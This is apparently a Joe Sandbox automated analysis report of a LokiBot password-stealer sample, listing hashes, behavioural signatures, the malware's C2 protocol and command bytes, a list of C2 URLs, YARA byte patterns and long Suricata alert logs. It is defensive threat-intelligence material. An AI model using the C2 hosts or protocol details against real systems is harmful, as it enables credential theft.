Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Hh8hqqbu9X.exe

Overview

General Information

Sample name:Hh8hqqbu9X.exe
renamed because original name is a hash value
Original sample name:f4c0448c427e926b0d3c0d1fbc1a866e.exe
Analysis ID:1579462
MD5:f4c0448c427e926b0d3c0d1fbc1a866e
SHA1:273aa64fd2523237acde7d342a09a259a3c5499a
SHA256:cee3904c1eb0245328cbbe8770f69417d56218ba9ed6ded95d60183264557fef
Tags:exeLokiuser-abuse_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Hh8hqqbu9X.exe (PID: 7064 cmdline: "C:\Users\user\Desktop\Hh8hqqbu9X.exe" MD5: F4C0448C427E926B0D3C0D1FBC1A866E)
    • vbc.exe (PID: 3292 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" MD5: D881DE17AA8F2E2C08CBB7B265F928F9)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.3381859873.00000000006C8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 24 entries
            SourceRuleDescriptionAuthorStrings
            1.2.vbc.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              1.2.vbc.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                1.2.vbc.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  1.2.vbc.exe.400000.0.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                  • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                  1.2.vbc.exe.400000.0.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                  • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                  Click to see the 40 entries
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-22T14:12:10.261798+010020243121A Network Trojan was detected192.168.2.54970492.113.16.6380TCP
                  2024-12-22T14:12:12.114201+010020243121A Network Trojan was detected192.168.2.54970592.113.16.6380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-22T14:12:08.679463+010020253811Malware Command and Control Activity Detected192.168.2.54970492.113.16.6380TCP
                  2024-12-22T14:12:10.630928+010020253811Malware Command and Control Activity Detected192.168.2.54970592.113.16.6380TCP
                  2024-12-22T14:12:12.555175+010020253811Malware Command and Control Activity Detected192.168.2.54970692.113.16.6380TCP
                  2024-12-22T14:12:14.486390+010020253811Malware Command and Control Activity Detected192.168.2.54970792.113.16.6380TCP
                  2024-12-22T14:12:16.506905+010020253811Malware Command and Control Activity Detected192.168.2.54970992.113.16.6380TCP
                  2024-12-22T14:12:18.490175+010020253811Malware Command and Control Activity Detected192.168.2.54971592.113.16.6380TCP
                  2024-12-22T14:12:20.454277+010020253811Malware Command and Control Activity Detected192.168.2.54971692.113.16.6380TCP
                  2024-12-22T14:12:22.413385+010020253811Malware Command and Control Activity Detected192.168.2.54972392.113.16.6380TCP
                  2024-12-22T14:12:24.298560+010020253811Malware Command and Control Activity Detected192.168.2.54973092.113.16.6380TCP
                  2024-12-22T14:12:26.270738+010020253811Malware Command and Control Activity Detected192.168.2.54973792.113.16.6380TCP
                  2024-12-22T14:12:28.206249+010020253811Malware Command and Control Activity Detected192.168.2.54974492.113.16.6380TCP
                  2024-12-22T14:12:30.193986+010020253811Malware Command and Control Activity Detected192.168.2.54975092.113.16.6380TCP
                  2024-12-22T14:12:32.170808+010020253811Malware Command and Control Activity Detected192.168.2.54975692.113.16.6380TCP
                  2024-12-22T14:12:34.048387+010020253811Malware Command and Control Activity Detected192.168.2.54976292.113.16.6380TCP
                  2024-12-22T14:12:35.977485+010020253811Malware Command and Control Activity Detected192.168.2.54976892.113.16.6380TCP
                  2024-12-22T14:12:37.922549+010020253811Malware Command and Control Activity Detected192.168.2.54977192.113.16.6380TCP
                  2024-12-22T14:12:39.913797+010020253811Malware Command and Control Activity Detected192.168.2.54977492.113.16.6380TCP
                  2024-12-22T14:12:41.792852+010020253811Malware Command and Control Activity Detected192.168.2.54977992.113.16.6380TCP
                  2024-12-22T14:12:43.778745+010020253811Malware Command and Control Activity Detected192.168.2.54978592.113.16.6380TCP
                  2024-12-22T14:12:45.725102+010020253811Malware Command and Control Activity Detected192.168.2.54979192.113.16.6380TCP
                  2024-12-22T14:12:47.702297+010020253811Malware Command and Control Activity Detected192.168.2.54979792.113.16.6380TCP
                  2024-12-22T14:12:49.654095+010020253811Malware Command and Control Activity Detected192.168.2.54980392.113.16.6380TCP
                  2024-12-22T14:12:51.781467+010020253811Malware Command and Control Activity Detected192.168.2.54980892.113.16.6380TCP
                  2024-12-22T14:12:53.776209+010020253811Malware Command and Control Activity Detected192.168.2.54981392.113.16.6380TCP
                  2024-12-22T14:12:55.748800+010020253811Malware Command and Control Activity Detected192.168.2.54981992.113.16.6380TCP
                  2024-12-22T14:12:57.639002+010020253811Malware Command and Control Activity Detected192.168.2.54982592.113.16.6380TCP
                  2024-12-22T14:12:59.653024+010020253811Malware Command and Control Activity Detected192.168.2.54982892.113.16.6380TCP
                  2024-12-22T14:13:01.607262+010020253811Malware Command and Control Activity Detected192.168.2.54983492.113.16.6380TCP
                  2024-12-22T14:13:03.485305+010020253811Malware Command and Control Activity Detected192.168.2.54984192.113.16.6380TCP
                  2024-12-22T14:13:05.648440+010020253811Malware Command and Control Activity Detected192.168.2.54984792.113.16.6380TCP
                  2024-12-22T14:13:07.852654+010020253811Malware Command and Control Activity Detected192.168.2.54985392.113.16.6780TCP
                  2024-12-22T14:13:09.825571+010020253811Malware Command and Control Activity Detected192.168.2.54985992.113.16.6780TCP
                  2024-12-22T14:13:11.829832+010020253811Malware Command and Control Activity Detected192.168.2.54986492.113.16.6780TCP
                  2024-12-22T14:13:13.746542+010020253811Malware Command and Control Activity Detected192.168.2.54987092.113.16.6780TCP
                  2024-12-22T14:13:15.701197+010020253811Malware Command and Control Activity Detected192.168.2.54987592.113.16.6780TCP
                  2024-12-22T14:13:17.691250+010020253811Malware Command and Control Activity Detected192.168.2.54987992.113.16.6780TCP
                  2024-12-22T14:13:19.580922+010020253811Malware Command and Control Activity Detected192.168.2.54988592.113.16.6780TCP
                  2024-12-22T14:13:21.563411+010020253811Malware Command and Control Activity Detected192.168.2.54988992.113.16.6780TCP
                  2024-12-22T14:13:23.430650+010020253811Malware Command and Control Activity Detected192.168.2.54989592.113.16.6780TCP
                  2024-12-22T14:13:25.406832+010020253811Malware Command and Control Activity Detected192.168.2.54990192.113.16.6780TCP
                  2024-12-22T14:13:27.394770+010020253811Malware Command and Control Activity Detected192.168.2.54990792.113.16.6780TCP
                  2024-12-22T14:13:29.361059+010020253811Malware Command and Control Activity Detected192.168.2.54991392.113.16.6780TCP
                  2024-12-22T14:13:31.366487+010020253811Malware Command and Control Activity Detected192.168.2.54991992.113.16.6780TCP
                  2024-12-22T14:13:33.340412+010020253811Malware Command and Control Activity Detected192.168.2.54992592.113.16.6780TCP
                  2024-12-22T14:13:35.225031+010020253811Malware Command and Control Activity Detected192.168.2.54993092.113.16.6780TCP
                  2024-12-22T14:13:37.184150+010020253811Malware Command and Control Activity Detected192.168.2.54993492.113.16.6780TCP
                  2024-12-22T14:13:39.191137+010020253811Malware Command and Control Activity Detected192.168.2.54994092.113.16.6780TCP
                  2024-12-22T14:13:41.217229+010020253811Malware Command and Control Activity Detected192.168.2.54994492.113.16.6780TCP
                  2024-12-22T14:13:43.173669+010020253811Malware Command and Control Activity Detected192.168.2.54995092.113.16.6780TCP
                  2024-12-22T14:13:45.134599+010020253811Malware Command and Control Activity Detected192.168.2.54995592.113.16.6780TCP
                  2024-12-22T14:13:47.131865+010020253811Malware Command and Control Activity Detected192.168.2.54995992.113.16.6780TCP
                  2024-12-22T14:13:49.082293+010020253811Malware Command and Control Activity Detected192.168.2.54996492.113.16.6780TCP
                  2024-12-22T14:13:50.975180+010020253811Malware Command and Control Activity Detected192.168.2.54997092.113.16.6780TCP
                  2024-12-22T14:13:52.942630+010020253811Malware Command and Control Activity Detected192.168.2.54997692.113.16.6780TCP
                  2024-12-22T14:13:55.208169+010020253811Malware Command and Control Activity Detected192.168.2.54998292.113.16.6780TCP
                  2024-12-22T14:13:57.115154+010020253811Malware Command and Control Activity Detected192.168.2.54998892.113.16.6780TCP
                  2024-12-22T14:13:59.078913+010020253811Malware Command and Control Activity Detected192.168.2.54999392.113.16.6780TCP
                  2024-12-22T14:14:01.034852+010020253811Malware Command and Control Activity Detected192.168.2.54999892.113.16.6780TCP
                  2024-12-22T14:14:02.984416+010020253811Malware Command and Control Activity Detected192.168.2.55000292.113.16.6780TCP
                  2024-12-22T14:14:04.984506+010020253811Malware Command and Control Activity Detected192.168.2.55000892.113.16.6780TCP
                  2024-12-22T14:14:07.223056+010020253811Malware Command and Control Activity Detected192.168.2.55001492.113.16.6780TCP
                  2024-12-22T14:14:09.389083+010020253811Malware Command and Control Activity Detected192.168.2.55002092.113.16.6780TCP
                  2024-12-22T14:14:11.258701+010020253811Malware Command and Control Activity Detected192.168.2.55002692.113.16.6780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-22T14:12:14.102015+010020243131Malware Command and Control Activity Detected192.168.2.54970692.113.16.6380TCP
                  2024-12-22T14:12:16.123769+010020243131Malware Command and Control Activity Detected192.168.2.54970792.113.16.6380TCP
                  2024-12-22T14:12:18.090018+010020243131Malware Command and Control Activity Detected192.168.2.54970992.113.16.6380TCP
                  2024-12-22T14:12:20.071784+010020243131Malware Command and Control Activity Detected192.168.2.54971592.113.16.6380TCP
                  2024-12-22T14:12:22.015203+010020243131Malware Command and Control Activity Detected192.168.2.54971692.113.16.6380TCP
                  2024-12-22T14:12:23.904363+010020243131Malware Command and Control Activity Detected192.168.2.54972392.113.16.6380TCP
                  2024-12-22T14:12:25.864302+010020243131Malware Command and Control Activity Detected192.168.2.54973092.113.16.6380TCP
                  2024-12-22T14:12:27.824506+010020243131Malware Command and Control Activity Detected192.168.2.54973792.113.16.6380TCP
                  2024-12-22T14:12:29.795605+010020243131Malware Command and Control Activity Detected192.168.2.54974492.113.16.6380TCP
                  2024-12-22T14:12:31.769591+010020243131Malware Command and Control Activity Detected192.168.2.54975092.113.16.6380TCP
                  2024-12-22T14:12:33.666583+010020243131Malware Command and Control Activity Detected192.168.2.54975692.113.16.6380TCP
                  2024-12-22T14:12:35.540017+010020243131Malware Command and Control Activity Detected192.168.2.54976292.113.16.6380TCP
                  2024-12-22T14:12:37.539487+010020243131Malware Command and Control Activity Detected192.168.2.54976892.113.16.6380TCP
                  2024-12-22T14:12:39.530868+010020243131Malware Command and Control Activity Detected192.168.2.54977192.113.16.6380TCP
                  2024-12-22T14:12:41.400417+010020243131Malware Command and Control Activity Detected192.168.2.54977492.113.16.6380TCP
                  2024-12-22T14:12:43.380560+010020243131Malware Command and Control Activity Detected192.168.2.54977992.113.16.6380TCP
                  2024-12-22T14:12:45.336914+010020243131Malware Command and Control Activity Detected192.168.2.54978592.113.16.6380TCP
                  2024-12-22T14:12:47.298735+010020243131Malware Command and Control Activity Detected192.168.2.54979192.113.16.6380TCP
                  2024-12-22T14:12:49.264336+010020243131Malware Command and Control Activity Detected192.168.2.54979792.113.16.6380TCP
                  2024-12-22T14:12:51.145466+010020243131Malware Command and Control Activity Detected192.168.2.54980392.113.16.6380TCP
                  2024-12-22T14:12:53.385422+010020243131Malware Command and Control Activity Detected192.168.2.54980892.113.16.6380TCP
                  2024-12-22T14:12:55.346077+010020243131Malware Command and Control Activity Detected192.168.2.54981392.113.16.6380TCP
                  2024-12-22T14:12:57.219949+010020243131Malware Command and Control Activity Detected192.168.2.54981992.113.16.6380TCP
                  2024-12-22T14:12:59.252987+010020243131Malware Command and Control Activity Detected192.168.2.54982592.113.16.6380TCP
                  2024-12-22T14:13:01.214492+010020243131Malware Command and Control Activity Detected192.168.2.54982892.113.16.6380TCP
                  2024-12-22T14:13:03.081093+010020243131Malware Command and Control Activity Detected192.168.2.54983492.113.16.6380TCP
                  2024-12-22T14:13:05.050729+010020243131Malware Command and Control Activity Detected192.168.2.54984192.113.16.6380TCP
                  2024-12-22T14:13:07.230683+010020243131Malware Command and Control Activity Detected192.168.2.54984792.113.16.6380TCP
                  2024-12-22T14:13:09.430877+010020243131Malware Command and Control Activity Detected192.168.2.54985392.113.16.6780TCP
                  2024-12-22T14:13:11.446115+010020243131Malware Command and Control Activity Detected192.168.2.54985992.113.16.6780TCP
                  2024-12-22T14:13:13.345038+010020243131Malware Command and Control Activity Detected192.168.2.54986492.113.16.6780TCP
                  2024-12-22T14:13:15.306696+010020243131Malware Command and Control Activity Detected192.168.2.54987092.113.16.6780TCP
                  2024-12-22T14:13:17.174002+010020243131Malware Command and Control Activity Detected192.168.2.54987592.113.16.6780TCP
                  2024-12-22T14:13:19.186341+010020243131Malware Command and Control Activity Detected192.168.2.54987992.113.16.6780TCP
                  2024-12-22T14:13:21.159824+010020243131Malware Command and Control Activity Detected192.168.2.54988592.113.16.6780TCP
                  2024-12-22T14:13:23.045578+010020243131Malware Command and Control Activity Detected192.168.2.54988992.113.16.6780TCP
                  2024-12-22T14:13:25.017097+010020243131Malware Command and Control Activity Detected192.168.2.54989592.113.16.6780TCP
                  2024-12-22T14:13:27.012094+010020243131Malware Command and Control Activity Detected192.168.2.54990192.113.16.6780TCP
                  2024-12-22T14:13:28.961341+010020243131Malware Command and Control Activity Detected192.168.2.54990792.113.16.6780TCP
                  2024-12-22T14:13:30.980596+010020243131Malware Command and Control Activity Detected192.168.2.54991392.113.16.6780TCP
                  2024-12-22T14:13:32.953227+010020243131Malware Command and Control Activity Detected192.168.2.54991992.113.16.6780TCP
                  2024-12-22T14:13:34.840080+010020243131Malware Command and Control Activity Detected192.168.2.54992592.113.16.6780TCP
                  2024-12-22T14:13:36.786857+010020243131Malware Command and Control Activity Detected192.168.2.54993092.113.16.6780TCP
                  2024-12-22T14:13:38.783948+010020243131Malware Command and Control Activity Detected192.168.2.54993492.113.16.6780TCP
                  2024-12-22T14:13:40.664036+010020243131Malware Command and Control Activity Detected192.168.2.54994092.113.16.6780TCP
                  2024-12-22T14:13:42.776806+010020243131Malware Command and Control Activity Detected192.168.2.54994492.113.16.6780TCP
                  2024-12-22T14:13:44.748036+010020243131Malware Command and Control Activity Detected192.168.2.54995092.113.16.6780TCP
                  2024-12-22T14:13:46.742499+010020243131Malware Command and Control Activity Detected192.168.2.54995592.113.16.6780TCP
                  2024-12-22T14:13:48.702998+010020243131Malware Command and Control Activity Detected192.168.2.54995992.113.16.6780TCP
                  2024-12-22T14:13:50.576775+010020243131Malware Command and Control Activity Detected192.168.2.54996492.113.16.6780TCP
                  2024-12-22T14:13:52.558386+010020243131Malware Command and Control Activity Detected192.168.2.54997092.113.16.6780TCP
                  2024-12-22T14:13:54.532204+010020243131Malware Command and Control Activity Detected192.168.2.54997692.113.16.6780TCP
                  2024-12-22T14:13:56.719927+010020243131Malware Command and Control Activity Detected192.168.2.54998292.113.16.6780TCP
                  2024-12-22T14:13:58.701138+010020243131Malware Command and Control Activity Detected192.168.2.54998892.113.16.6780TCP
                  2024-12-22T14:14:00.640245+010020243131Malware Command and Control Activity Detected192.168.2.54999392.113.16.6780TCP
                  2024-12-22T14:14:02.599810+010020243131Malware Command and Control Activity Detected192.168.2.54999892.113.16.6780TCP
                  2024-12-22T14:14:04.589436+010020243131Malware Command and Control Activity Detected192.168.2.55000292.113.16.6780TCP
                  2024-12-22T14:14:06.546732+010020243131Malware Command and Control Activity Detected192.168.2.55000892.113.16.6780TCP
                  2024-12-22T14:14:08.782719+010020243131Malware Command and Control Activity Detected192.168.2.55001492.113.16.6780TCP
                  2024-12-22T14:14:10.859231+010020243131Malware Command and Control Activity Detected192.168.2.55002092.113.16.6780TCP
                  2024-12-22T14:14:12.817010+010020243131Malware Command and Control Activity Detected192.168.2.55002692.113.16.6780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-22T14:12:14.102015+010020243181Malware Command and Control Activity Detected192.168.2.54970692.113.16.6380TCP
                  2024-12-22T14:12:16.123769+010020243181Malware Command and Control Activity Detected192.168.2.54970792.113.16.6380TCP
                  2024-12-22T14:12:18.090018+010020243181Malware Command and Control Activity Detected192.168.2.54970992.113.16.6380TCP
                  2024-12-22T14:12:20.071784+010020243181Malware Command and Control Activity Detected192.168.2.54971592.113.16.6380TCP
                  2024-12-22T14:12:22.015203+010020243181Malware Command and Control Activity Detected192.168.2.54971692.113.16.6380TCP
                  2024-12-22T14:12:23.904363+010020243181Malware Command and Control Activity Detected192.168.2.54972392.113.16.6380TCP
                  2024-12-22T14:12:25.864302+010020243181Malware Command and Control Activity Detected192.168.2.54973092.113.16.6380TCP
                  2024-12-22T14:12:27.824506+010020243181Malware Command and Control Activity Detected192.168.2.54973792.113.16.6380TCP
                  2024-12-22T14:12:29.795605+010020243181Malware Command and Control Activity Detected192.168.2.54974492.113.16.6380TCP
                  2024-12-22T14:12:31.769591+010020243181Malware Command and Control Activity Detected192.168.2.54975092.113.16.6380TCP
                  2024-12-22T14:12:33.666583+010020243181Malware Command and Control Activity Detected192.168.2.54975692.113.16.6380TCP
                  2024-12-22T14:12:35.540017+010020243181Malware Command and Control Activity Detected192.168.2.54976292.113.16.6380TCP
                  2024-12-22T14:12:37.539487+010020243181Malware Command and Control Activity Detected192.168.2.54976892.113.16.6380TCP
                  2024-12-22T14:12:39.530868+010020243181Malware Command and Control Activity Detected192.168.2.54977192.113.16.6380TCP
                  2024-12-22T14:12:41.400417+010020243181Malware Command and Control Activity Detected192.168.2.54977492.113.16.6380TCP
                  2024-12-22T14:12:43.380560+010020243181Malware Command and Control Activity Detected192.168.2.54977992.113.16.6380TCP
                  2024-12-22T14:12:45.336914+010020243181Malware Command and Control Activity Detected192.168.2.54978592.113.16.6380TCP
                  2024-12-22T14:12:47.298735+010020243181Malware Command and Control Activity Detected192.168.2.54979192.113.16.6380TCP
                  2024-12-22T14:12:49.264336+010020243181Malware Command and Control Activity Detected192.168.2.54979792.113.16.6380TCP
                  2024-12-22T14:12:51.145466+010020243181Malware Command and Control Activity Detected192.168.2.54980392.113.16.6380TCP
                  2024-12-22T14:12:53.385422+010020243181Malware Command and Control Activity Detected192.168.2.54980892.113.16.6380TCP
                  2024-12-22T14:12:55.346077+010020243181Malware Command and Control Activity Detected192.168.2.54981392.113.16.6380TCP
                  2024-12-22T14:12:57.219949+010020243181Malware Command and Control Activity Detected192.168.2.54981992.113.16.6380TCP
                  2024-12-22T14:12:59.252987+010020243181Malware Command and Control Activity Detected192.168.2.54982592.113.16.6380TCP
                  2024-12-22T14:13:01.214492+010020243181Malware Command and Control Activity Detected192.168.2.54982892.113.16.6380TCP
                  2024-12-22T14:13:03.081093+010020243181Malware Command and Control Activity Detected192.168.2.54983492.113.16.6380TCP
                  2024-12-22T14:13:05.050729+010020243181Malware Command and Control Activity Detected192.168.2.54984192.113.16.6380TCP
                  2024-12-22T14:13:07.230683+010020243181Malware Command and Control Activity Detected192.168.2.54984792.113.16.6380TCP
                  2024-12-22T14:13:09.430877+010020243181Malware Command and Control Activity Detected192.168.2.54985392.113.16.6780TCP
                  2024-12-22T14:13:11.446115+010020243181Malware Command and Control Activity Detected192.168.2.54985992.113.16.6780TCP
                  2024-12-22T14:13:13.345038+010020243181Malware Command and Control Activity Detected192.168.2.54986492.113.16.6780TCP
                  2024-12-22T14:13:15.306696+010020243181Malware Command and Control Activity Detected192.168.2.54987092.113.16.6780TCP
                  2024-12-22T14:13:17.174002+010020243181Malware Command and Control Activity Detected192.168.2.54987592.113.16.6780TCP
                  2024-12-22T14:13:19.186341+010020243181Malware Command and Control Activity Detected192.168.2.54987992.113.16.6780TCP
                  2024-12-22T14:13:21.159824+010020243181Malware Command and Control Activity Detected192.168.2.54988592.113.16.6780TCP
                  2024-12-22T14:13:23.045578+010020243181Malware Command and Control Activity Detected192.168.2.54988992.113.16.6780TCP
                  2024-12-22T14:13:25.017097+010020243181Malware Command and Control Activity Detected192.168.2.54989592.113.16.6780TCP
                  2024-12-22T14:13:27.012094+010020243181Malware Command and Control Activity Detected192.168.2.54990192.113.16.6780TCP
                  2024-12-22T14:13:28.961341+010020243181Malware Command and Control Activity Detected192.168.2.54990792.113.16.6780TCP
                  2024-12-22T14:13:30.980596+010020243181Malware Command and Control Activity Detected192.168.2.54991392.113.16.6780TCP
                  2024-12-22T14:13:32.953227+010020243181Malware Command and Control Activity Detected192.168.2.54991992.113.16.6780TCP
                  2024-12-22T14:13:34.840080+010020243181Malware Command and Control Activity Detected192.168.2.54992592.113.16.6780TCP
                  2024-12-22T14:13:36.786857+010020243181Malware Command and Control Activity Detected192.168.2.54993092.113.16.6780TCP
                  2024-12-22T14:13:38.783948+010020243181Malware Command and Control Activity Detected192.168.2.54993492.113.16.6780TCP
                  2024-12-22T14:13:40.664036+010020243181Malware Command and Control Activity Detected192.168.2.54994092.113.16.6780TCP
                  2024-12-22T14:13:42.776806+010020243181Malware Command and Control Activity Detected192.168.2.54994492.113.16.6780TCP
                  2024-12-22T14:13:44.748036+010020243181Malware Command and Control Activity Detected192.168.2.54995092.113.16.6780TCP
                  2024-12-22T14:13:46.742499+010020243181Malware Command and Control Activity Detected192.168.2.54995592.113.16.6780TCP
                  2024-12-22T14:13:48.702998+010020243181Malware Command and Control Activity Detected192.168.2.54995992.113.16.6780TCP
                  2024-12-22T14:13:50.576775+010020243181Malware Command and Control Activity Detected192.168.2.54996492.113.16.6780TCP
                  2024-12-22T14:13:52.558386+010020243181Malware Command and Control Activity Detected192.168.2.54997092.113.16.6780TCP
                  2024-12-22T14:13:54.532204+010020243181Malware Command and Control Activity Detected192.168.2.54997692.113.16.6780TCP
                  2024-12-22T14:13:56.719927+010020243181Malware Command and Control Activity Detected192.168.2.54998292.113.16.6780TCP
                  2024-12-22T14:13:58.701138+010020243181Malware Command and Control Activity Detected192.168.2.54998892.113.16.6780TCP
                  2024-12-22T14:14:00.640245+010020243181Malware Command and Control Activity Detected192.168.2.54999392.113.16.6780TCP
                  2024-12-22T14:14:02.599810+010020243181Malware Command and Control Activity Detected192.168.2.54999892.113.16.6780TCP
                  2024-12-22T14:14:04.589436+010020243181Malware Command and Control Activity Detected192.168.2.55000292.113.16.6780TCP
                  2024-12-22T14:14:06.546732+010020243181Malware Command and Control Activity Detected192.168.2.55000892.113.16.6780TCP
                  2024-12-22T14:14:08.782719+010020243181Malware Command and Control Activity Detected192.168.2.55001492.113.16.6780TCP
                  2024-12-22T14:14:10.859231+010020243181Malware Command and Control Activity Detected192.168.2.55002092.113.16.6780TCP
                  2024-12-22T14:14:12.817010+010020243181Malware Command and Control Activity Detected192.168.2.55002692.113.16.6780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-22T14:12:08.679463+010020216411A Network Trojan was detected192.168.2.54970492.113.16.6380TCP
                  2024-12-22T14:12:10.630928+010020216411A Network Trojan was detected192.168.2.54970592.113.16.6380TCP
                  2024-12-22T14:12:12.555175+010020216411A Network Trojan was detected192.168.2.54970692.113.16.6380TCP
                  2024-12-22T14:12:14.486390+010020216411A Network Trojan was detected192.168.2.54970792.113.16.6380TCP
                  2024-12-22T14:12:16.506905+010020216411A Network Trojan was detected192.168.2.54970992.113.16.6380TCP
                  2024-12-22T14:12:18.490175+010020216411A Network Trojan was detected192.168.2.54971592.113.16.6380TCP
                  2024-12-22T14:12:20.454277+010020216411A Network Trojan was detected192.168.2.54971692.113.16.6380TCP
                  2024-12-22T14:12:22.413385+010020216411A Network Trojan was detected192.168.2.54972392.113.16.6380TCP
